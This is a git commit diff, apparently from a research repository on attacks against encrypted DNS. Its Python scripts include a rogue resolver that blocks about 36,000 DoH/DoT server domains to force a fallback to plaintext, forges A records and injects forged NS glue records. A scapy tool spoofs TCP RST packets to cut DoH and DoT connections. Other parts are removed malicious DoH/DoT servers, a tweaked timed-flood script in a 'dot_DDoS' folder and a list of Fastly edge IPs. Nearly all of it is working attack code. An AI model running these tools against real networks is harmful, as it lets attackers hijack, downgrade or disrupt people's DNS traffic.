This commit is contained in:
“shihaoyue”
2024-10-21 14:58:36 +08:00
parent 0eadbb7401
commit 0b12a25356
45 changed files with 145898 additions and 366 deletions

Binary file not shown.

View File

@@ -0,0 +1,76 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
from logger_DoE import *
import pandas as pd
domains = set(pd.read_csv('domains.csv').domain)
upstream_server = '223.5.5.5'
# 创建监听socket
listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
listener.bind(('127.0.0.54', 53))
parser = argparse.ArgumentParser()
parser.add_argument('-pass', '--passdoe', default=0)
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='1.1.1.1')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
while True:
# 接收DNS请求
data, addr = listener.recvfrom(1024)
#print(dns.message.from_wire(data))
data = dns.message.from_wire(data)
query_r = data.question[0].name.to_text()[:-1]
if query_r in domains and args.passdoe==0:
# print(data.question[0].name.to_text()[:-1])
# print(addr)
#print(data)
#print('对DoE域名的DNS请求', query_r)
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, f'对DoE域名的DNS请求{query_r}')
# # 创建TLS连接并发送DNS请求到上游服务器
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
#print('DNS响应', resp.answer)
resp.answer = [dns.rrset.from_text(query_r+'.', 3600, dns.rdataclass.IN, dns.rdatatype.A, '10.10.10.10')]
#print(f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.INFO, f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.PAYLOAD, str(resp.answer.__str__()))
# with socket.create_connection((upstream_server,853)) as sock:
# with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
# tls_sock.sendall(data.to_wire())
# resp = tls_sock.recv(4096)
# 将上游服务器的响应发送回客户端
listener.sendto(resp.to_wire(), addr)
else:
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
if str(resp.question[0].name) == tamper and int(resp.question[0].rdtype) == 1:
print('---tamper---', tamper)
resp.answer = [
dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '8.8.8.8')]
if str(resp.question[0].name) == inject:
print('---inject---', inject)
resp.additional = [
dns.rrset.from_text(inject, 3600, dns.rdataclass.IN, dns.rdatatype.NS, 'ns.' + inject.split('.', 1)[1]),
dns.rrset.from_text('ns.' + inject.split('.', 1)[1], 3600, dns.rdataclass.IN, dns.rdatatype.A, ns)]
listener.sendto(resp.to_wire(), addr)
#break

View File

@@ -0,0 +1,49 @@
import asyncio
from scapy.all import *
import argparse
from logger_DoE import *
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
async def process_packet(packet):
if TCP in packet:
seq = packet[TCP].seq
ack = packet[TCP].ack
local_port = packet[TCP].sport
print(f"Seq: {seq}, Ack: {ack}")
# Construct a new packet to send
rst_packet = Ether(dst="00:16:3e:08:8b:25", src="ee:ff:ff:ff:ff:ff") / IP(dst=local_ip, src=target_ip) / TCP(sport=target_port,
dport=local_port, flags="AR",
seq=ack, ack=seq+1, window=0)
sendp(rst_packet, iface='eth0')
logger.log_info(LogLevel.PAYLOAD, rst_packet)
def sniff_packets():
# Define a callback for processing packets
def callback(packet):
asyncio.run(process_packet(packet))
# Start sniffing
sniff(prn=callback, filter=f"tcp and ip src {local_ip} and ip dst {target_ip} and tcp dst port {target_port}", store=0,iface='eth0')
def main():
sniff_packets()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--protocol', default='doh')
parser.add_argument('-ip', '--ip', default='94.140.14.14')
args = parser.parse_args()
# target_ip = "94.140.14.14"
# target_port = 443
ports = {'doh':443, 'dot':853}
target_ip = args.ip
target_port = ports[args.protocol]
local_ip = "172.22.115.154"
main()

36096
10_doh_injection/domains.csv Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,63 +0,0 @@
import argparse
import base64
import ssl
import dns.asyncquery
import dns.rcode
import aiohttp
import dns.message
import dns.rrset
from aiohttp import web
DNS_SERVER_ADDRESS = '223.5.5.5'
DNS_SERVER_PORT = 53
async def doh_handler(request):
if request.method == "GET":
rquery = str(request.query).split(' ')[1]
#print(rquery)
rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
else:
try:
doh_request = dns.message.from_wire(await request.read())
except :
return web.Response(text='Invalid DNS request', status=400)
dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
dns_request.id = doh_request.id
# 发起DNS请求
dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
#print(dns_response)
if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
print('---tamper---',tamper)
dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
if str(doh_request.question[0].name) == inject:
print('---inject---',inject)
dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
#print(dns_response)
# 构建HTTPS响应
response = web.Response(body=dns_response.to_wire())
response.content_type = 'application/dns-message'
return response
parser = argparse.ArgumentParser()
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='39.106.44.126')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
#print('tamper:',tamper)
DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
app = web.Application()
app.router.add_get(path='/dns-query',handler=doh_handler)
app.router.add_post(path='/dns-query',handler=doh_handler)
web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)

View File

@@ -0,0 +1,52 @@
# -*- coding: utf-8 -*-
import time
import json
import threading
from queue import Queue
class LogLevel:
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
PAYLOAD = "PAYLOAD"
class LogEntry:
def __init__(self, log_level, log_info):
self.created_time = time.strftime("%Y-%m-%d %H:%M:%S")
self.log_level = log_level
self.log_info = log_info
class InfoLogger:
def __init__(self, interval=1):
self.log_queue = Queue()
self.interval = interval
self.logging_thread = threading.Thread(target=self.start_logging)
self.logging_thread.daemon = True
self.logging_thread.start()
def start_logging(self):
while True:
entry = self.log_queue.get()
if entry is None: # 退出信号
break
# time.sleep(self.interval) # 延迟输出
# 确保输出中文
print(json.dumps(entry.__dict__, ensure_ascii=False))
def log_info(self, level, message):
entry = LogEntry(level, message)
self.log_queue.put(entry) # 将日志条目发送到队列
def close(self):
self.log_queue.put(None) # 发送退出信号
self.logging_thread.join() # 等待线程结束
# 主函数
# if __name__ == "__main__":
# logger = InfoLogger(interval=1)
# logger.log_info(LogLevel.INFO, "程序开始运行")
# logger.log_info(LogLevel.WARNING, "这是一个警告信息")
# logger.log_info(LogLevel.ERROR, "发生了一个错误")
# logger.log_info(LogLevel.PAYLOAD, "处理的有效负载信息")
# logger.log_info(LogLevel.INFO, "程序结束运行")
# logger.close() # 关闭日志记录

View File

@@ -0,0 +1,77 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
import base64
import httpx
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(doh,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=doh, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{doh} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(doh_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{doh_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
headers = {"content-type": "application/dns-message", "accept": "application/dns-message", "host":doh_ip}
for i in range(1,4):
try:
with httpx.Client(http2=True, http1=True, verify=True, timeout=5) as client:
resp = client.get(f"https://{doh_ip}/dns-query?dns=" + base64.b64encode(query.to_wire()).decode("UTF8").rstrip("="),
headers=headers)
response_message = dns.message.from_wire(resp.content)
#print(response_message)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-doh', '--doh', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoH server: {args.doh}')
try:
if ipaddress.ip_address(args.doh):
p2(args.doh, args.mode, args.name, args.type)
except:
p1(args.doh,args.mode,args.name,args.type)

View File

@@ -0,0 +1,68 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(dot,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=dot, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{dot} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(dot_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{dot_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
for i in range(1,4):
try:
response_message = dns.query.tls(q=query, port=853, where=dot_ip, timeout=5,verify=True)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-dot', '--dot', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoT server: {args.dot}')
try:
if ipaddress.ip_address(args.dot):
p2(args.dot, args.mode, args.name, args.type)
except:
p1(args.dot,args.mode,args.name,args.type)

Binary file not shown.

View File

@@ -0,0 +1,76 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
from logger_DoE import *
import pandas as pd
domains = set(pd.read_csv('domains.csv').domain)
upstream_server = '223.5.5.5'
# 创建监听socket
listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
listener.bind(('127.0.0.54', 53))
parser = argparse.ArgumentParser()
parser.add_argument('-pass', '--passdoe', default=0)
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='1.1.1.1')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
while True:
# 接收DNS请求
data, addr = listener.recvfrom(1024)
#print(dns.message.from_wire(data))
data = dns.message.from_wire(data)
query_r = data.question[0].name.to_text()[:-1]
if query_r in domains and args.passdoe==0:
# print(data.question[0].name.to_text()[:-1])
# print(addr)
#print(data)
#print('对DoE域名的DNS请求', query_r)
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, f'对DoE域名的DNS请求{query_r}')
# # 创建TLS连接并发送DNS请求到上游服务器
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
#print('DNS响应', resp.answer)
resp.answer = [dns.rrset.from_text(query_r+'.', 3600, dns.rdataclass.IN, dns.rdatatype.A, '10.10.10.10')]
#print(f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.INFO, f'对DoE域名{query_r}的DNS请求已阻断返回10.10.10.10')
logger.log_info(LogLevel.PAYLOAD, str(resp.answer.__str__()))
# with socket.create_connection((upstream_server,853)) as sock:
# with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
# tls_sock.sendall(data.to_wire())
# resp = tls_sock.recv(4096)
# 将上游服务器的响应发送回客户端
listener.sendto(resp.to_wire(), addr)
else:
resp = dns.query.udp(
q=data,
where=upstream_server,
timeout=10)
if str(resp.question[0].name) == tamper and int(resp.question[0].rdtype) == 1:
print('---tamper---', tamper)
resp.answer = [
dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '8.8.8.8')]
if str(resp.question[0].name) == inject:
print('---inject---', inject)
resp.additional = [
dns.rrset.from_text(inject, 3600, dns.rdataclass.IN, dns.rdatatype.NS, 'ns.' + inject.split('.', 1)[1]),
dns.rrset.from_text('ns.' + inject.split('.', 1)[1], 3600, dns.rdataclass.IN, dns.rdatatype.A, ns)]
listener.sendto(resp.to_wire(), addr)
#break

View File

@@ -0,0 +1,49 @@
import asyncio
from scapy.all import *
import argparse
from logger_DoE import *
logger = InfoLogger(interval=1)
logger.log_info(LogLevel.INFO, "程序开始运行")
async def process_packet(packet):
if TCP in packet:
seq = packet[TCP].seq
ack = packet[TCP].ack
local_port = packet[TCP].sport
print(f"Seq: {seq}, Ack: {ack}")
# Construct a new packet to send
rst_packet = Ether(dst="00:16:3e:08:8b:25", src="ee:ff:ff:ff:ff:ff") / IP(dst=local_ip, src=target_ip) / TCP(sport=target_port,
dport=local_port, flags="AR",
seq=ack, ack=seq+1, window=0)
sendp(rst_packet, iface='eth0')
logger.log_info(LogLevel.PAYLOAD, rst_packet)
def sniff_packets():
# Define a callback for processing packets
def callback(packet):
asyncio.run(process_packet(packet))
# Start sniffing
sniff(prn=callback, filter=f"tcp and ip src {local_ip} and ip dst {target_ip} and tcp dst port {target_port}", store=0,iface='eth0')
def main():
sniff_packets()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--protocol', default='doh')
parser.add_argument('-ip', '--ip', default='94.140.14.14')
args = parser.parse_args()
# target_ip = "94.140.14.14"
# target_port = 443
ports = {'doh':443, 'dot':853}
target_ip = args.ip
target_port = ports[args.protocol]
local_ip = "172.22.115.154"
main()

36096
11_dot_injection/domains.csv Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,45 +0,0 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-dot', '--dot', default='dns.alidns.com')
args = parser.parse_args()
print(f'DoT server: {args.dot}')
upstream_server = '47.88.31.213'
# 创建监听socket
listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
listener.bind(('127.0.0.1', 53))
# 创建TLS连接
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
while True:
# 接收DNS请求
data, addr = listener.recvfrom(1024)
#print(dns.message.from_wire(data))
data = dns.message.from_wire(data)
if 'baidu' in data.question.__str__():
# print(data)
# print(addr)
print('DNS请求', data.question)
# # 创建TLS连接并发送DNS请求到上游服务器
resp = dns.query.tls(
q=data,
where=upstream_server,
timeout=10,
ssl_context=context)
print('DNS响应', resp.answer)
# with socket.create_connection((upstream_server,853)) as sock:
# with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
# tls_sock.sendall(data.to_wire())
# resp = tls_sock.recv(4096)
# 将上游服务器的响应发送回客户端
listener.sendto(resp.to_wire(), addr)
break

View File

@@ -1,63 +0,0 @@
import argparse
import asyncio
import ssl
import socket
import dns.asyncquery
import dns.message
import dns.rcode
import dns.flags
import dns.message
import dns.rrset
from dnslib import DNSRecord
async handle_client(reader, writer):
request_data = await reader.read(1024)
request = dns.message.from_wire(request_data[2:])
#print(request)
dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
dns_request.id = request.id
#print(dns_request)
dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
#print(dns_response)
if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
print('---tamper---', tamper)
dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
if str(request.question[0].name) == inject:
print('---inject---', inject)
dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
#print(dns_response)
response_data = dns_response
record_header = len(response_data.to_wire()).to_bytes(2, 'big')
# 构建完整的TLS响应数据
tls_response_data = record_header + response_data.to_wire()
writer.write(tls_response_data)
await writer.drain()
writer.close()
async start_server():
# 配置服务器参数
listen_address = '0.0.0.0'
listen_port = 853
CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
# 创建TCP服务器
server = await asyncio.start_server(
handle_client, listen_address, listen_port, ssl=context)
print(f'DoT server listening on {listen_address}:{listen_port}')
async with server:
await server.serve_forever()
parser = argparse.ArgumentParser()
parser.add_argument('-tamper', '--tamper', default='')
parser.add_argument('-inject', '--inject', default='')
parser.add_argument('-ns', '--ns', default='39.106.44.126')
args = parser.parse_args()
tamper = args.tamper +'.'
inject = args.inject +'.'
ns = args.ns
asyncio.run(start_server())

View File

@@ -0,0 +1,52 @@
# -*- coding: utf-8 -*-
import time
import json
import threading
from queue import Queue
class LogLevel:
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
PAYLOAD = "PAYLOAD"
class LogEntry:
def __init__(self, log_level, log_info):
self.created_time = time.strftime("%Y-%m-%d %H:%M:%S")
self.log_level = log_level
self.log_info = log_info
class InfoLogger:
def __init__(self, interval=1):
self.log_queue = Queue()
self.interval = interval
self.logging_thread = threading.Thread(target=self.start_logging)
self.logging_thread.daemon = True
self.logging_thread.start()
def start_logging(self):
while True:
entry = self.log_queue.get()
if entry is None: # 退出信号
break
# time.sleep(self.interval) # 延迟输出
# 确保输出中文
print(json.dumps(entry.__dict__, ensure_ascii=False))
def log_info(self, level, message):
entry = LogEntry(level, message)
self.log_queue.put(entry) # 将日志条目发送到队列
def close(self):
self.log_queue.put(None) # 发送退出信号
self.logging_thread.join() # 等待线程结束
# 主函数
# if __name__ == "__main__":
# logger = InfoLogger(interval=1)
# logger.log_info(LogLevel.INFO, "程序开始运行")
# logger.log_info(LogLevel.WARNING, "这是一个警告信息")
# logger.log_info(LogLevel.ERROR, "发生了一个错误")
# logger.log_info(LogLevel.PAYLOAD, "处理的有效负载信息")
# logger.log_info(LogLevel.INFO, "程序结束运行")
# logger.close() # 关闭日志记录

View File

@@ -0,0 +1,77 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
import base64
import httpx
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(doh,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=doh, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{doh} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(doh_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{doh_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
headers = {"content-type": "application/dns-message", "accept": "application/dns-message", "host":doh_ip}
for i in range(1,4):
try:
with httpx.Client(http2=True, http1=True, verify=True, timeout=5) as client:
resp = client.get(f"https://{doh_ip}/dns-query?dns=" + base64.b64encode(query.to_wire()).decode("UTF8").rstrip("="),
headers=headers)
response_message = dns.message.from_wire(resp.content)
#print(response_message)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-doh', '--doh', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoH server: {args.doh}')
try:
if ipaddress.ip_address(args.doh):
p2(args.doh, args.mode, args.name, args.type)
except:
p1(args.doh,args.mode,args.name,args.type)

View File

@@ -0,0 +1,68 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(dot,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=dot, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{dot} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(dot_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{dot_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
for i in range(1,4):
try:
response_message = dns.query.tls(q=query, port=853, where=dot_ip, timeout=5,verify=True)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-dot', '--dot', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoT server: {args.dot}')
try:
if ipaddress.ip_address(args.dot):
p2(args.dot, args.mode, args.name, args.type)
except:
p1(args.dot,args.mode,args.name,args.type)

Binary file not shown.

Binary file not shown.

View File

@@ -18,6 +18,7 @@ import tqdm
from concurrent.futures import ThreadPoolExecutor from concurrent.futures import ThreadPoolExecutor
import threading import threading
from dns.message import make_query from dns.message import make_query
from logger_DoE import *
def ge_cookie(): def ge_cookie():
cookie = "" cookie = ""
@@ -111,7 +112,7 @@ if __name__ == '__main__':
start_time = time.perf_counter() start_time = time.perf_counter()
# while time.perf_counter() - start_time < 0.1: # while time.perf_counter() - start_time < 0.1:
# pass # pass
print('all waiting') #print('all waiting')
while time.perf_counter() - stime < wait_time: while time.perf_counter() - stime < wait_time:
pass pass
# 触发事件,同时释放所有线程 # 触发事件,同时释放所有线程
@@ -119,7 +120,7 @@ if __name__ == '__main__':
# 等待所有线程完成 # 等待所有线程完成
for t in threads: for t in threads:
t.join() t.join()
print('ATT over:',time.time() - s_time) #print('ATT over:',time.time() - s_time)
#for i in tqdm.tqdm(range(1000)): #for i in tqdm.tqdm(range(1000)):
#send_request("151.101.76.204",0,0,0) #send_request("151.101.76.204",0,0,0)

65
6_dot_DDoS/fastly_att.csv Normal file
View File

@@ -0,0 +1,65 @@
ip,latency
151.101.176.204,0.0
199.232.112.204,20.174415906270383
151.101.216.204,164.30801947911584
151.101.84.204,189.15273348490393
151.101.244.204,199.20119841893518
151.101.252.204,206.1764796574911
146.75.120.204,226.36029322942102
151.101.132.204,236.9340340296427
146.75.116.204,241.16920232772827
151.101.8.204,245.57103315989173
146.75.56.204,246.24038537343347
199.232.168.204,268.50428581237793
151.101.36.204,279.2840361595154
146.75.72.204,286.16975943247473
151.101.220.204,291.5731271107992
199.232.188.204,292.1649694442749
199.232.40.204,303.6079406738281
199.232.52.204,310.2594097455343
146.75.60.204,315.7567103703817
151.101.236.204,324.4780898094177
151.101.60.204,333.3046237627665
199.232.16.204,340.94427824020386
146.75.4.204,343.24026902516687
199.232.132.204,343.66803566614783
146.75.52.204,343.79214445749915
151.101.240.204,346.39684756596887
146.75.0.204,367.51374403635657
199.232.24.204,383.8797012964884
199.232.80.204,388.3073488871256
199.232.56.204,391.30493799845374
146.75.76.204,395.0240969657898
146.75.80.204,402.90646155675256
146.75.124.204,412.90348768234253
199.232.20.204,425.53412914276123
151.101.140.204,444.1699981689453
146.75.104.204,444.1818634668986
146.75.12.204,450.5188186963399
151.101.136.204,450.8180618286133
146.75.96.204,453.5397529602051
151.101.80.204,463.5060667991638
199.232.104.204,472.38902648289996
146.75.48.204,474.9836524327596
151.101.28.204,491.81838035583496
151.101.96.204,510.57063341140747
151.101.124.204,512.3162309328716
151.101.40.204,530.2466909090679
146.75.100.204,530.3682049115499
151.101.152.204,534.3550761540731
151.101.232.204,538.0456407864889
151.101.156.204,543.1010007858276
146.75.92.204,548.6201683680217
151.101.164.204,551.1252562204998
151.101.108.204,590.0793274243673
151.101.104.204,601.1172771453857
146.75.40.204,609.0019901593525
146.75.108.204,620.5932696660359
199.232.44.204,660.7414801915486
151.101.212.204,666.8978889783223
146.75.24.204,669.6149627367655
151.101.88.204,679.8292676607767
146.75.112.204,705.912446975708
151.101.228.204,718.2093580563863
146.75.20.204,725.5708734194438
151.101.76.204,750.7945179939271
1 ip latency
2 151.101.176.204 0.0
3 199.232.112.204 20.174415906270383
4 151.101.216.204 164.30801947911584
5 151.101.84.204 189.15273348490393
6 151.101.244.204 199.20119841893518
7 151.101.252.204 206.1764796574911
8 146.75.120.204 226.36029322942102
9 151.101.132.204 236.9340340296427
10 146.75.116.204 241.16920232772827
11 151.101.8.204 245.57103315989173
12 146.75.56.204 246.24038537343347
13 199.232.168.204 268.50428581237793
14 151.101.36.204 279.2840361595154
15 146.75.72.204 286.16975943247473
16 151.101.220.204 291.5731271107992
17 199.232.188.204 292.1649694442749
18 199.232.40.204 303.6079406738281
19 199.232.52.204 310.2594097455343
20 146.75.60.204 315.7567103703817
21 151.101.236.204 324.4780898094177
22 151.101.60.204 333.3046237627665
23 199.232.16.204 340.94427824020386
24 146.75.4.204 343.24026902516687
25 199.232.132.204 343.66803566614783
26 146.75.52.204 343.79214445749915
27 151.101.240.204 346.39684756596887
28 146.75.0.204 367.51374403635657
29 199.232.24.204 383.8797012964884
30 199.232.80.204 388.3073488871256
31 199.232.56.204 391.30493799845374
32 146.75.76.204 395.0240969657898
33 146.75.80.204 402.90646155675256
34 146.75.124.204 412.90348768234253
35 199.232.20.204 425.53412914276123
36 151.101.140.204 444.1699981689453
37 146.75.104.204 444.1818634668986
38 146.75.12.204 450.5188186963399
39 151.101.136.204 450.8180618286133
40 146.75.96.204 453.5397529602051
41 151.101.80.204 463.5060667991638
42 199.232.104.204 472.38902648289996
43 146.75.48.204 474.9836524327596
44 151.101.28.204 491.81838035583496
45 151.101.96.204 510.57063341140747
46 151.101.124.204 512.3162309328716
47 151.101.40.204 530.2466909090679
48 146.75.100.204 530.3682049115499
49 151.101.152.204 534.3550761540731
50 151.101.232.204 538.0456407864889
51 151.101.156.204 543.1010007858276
52 146.75.92.204 548.6201683680217
53 151.101.164.204 551.1252562204998
54 151.101.108.204 590.0793274243673
55 151.101.104.204 601.1172771453857
56 146.75.40.204 609.0019901593525
57 146.75.108.204 620.5932696660359
58 199.232.44.204 660.7414801915486
59 151.101.212.204 666.8978889783223
60 146.75.24.204 669.6149627367655
61 151.101.88.204 679.8292676607767
62 146.75.112.204 705.912446975708
63 151.101.228.204 718.2093580563863
64 146.75.20.204 725.5708734194438
65 151.101.76.204 750.7945179939271

52
6_dot_DDoS/logger_DoE.py Normal file
View File

@@ -0,0 +1,52 @@
# -*- coding: utf-8 -*-
import time
import json
import threading
from queue import Queue
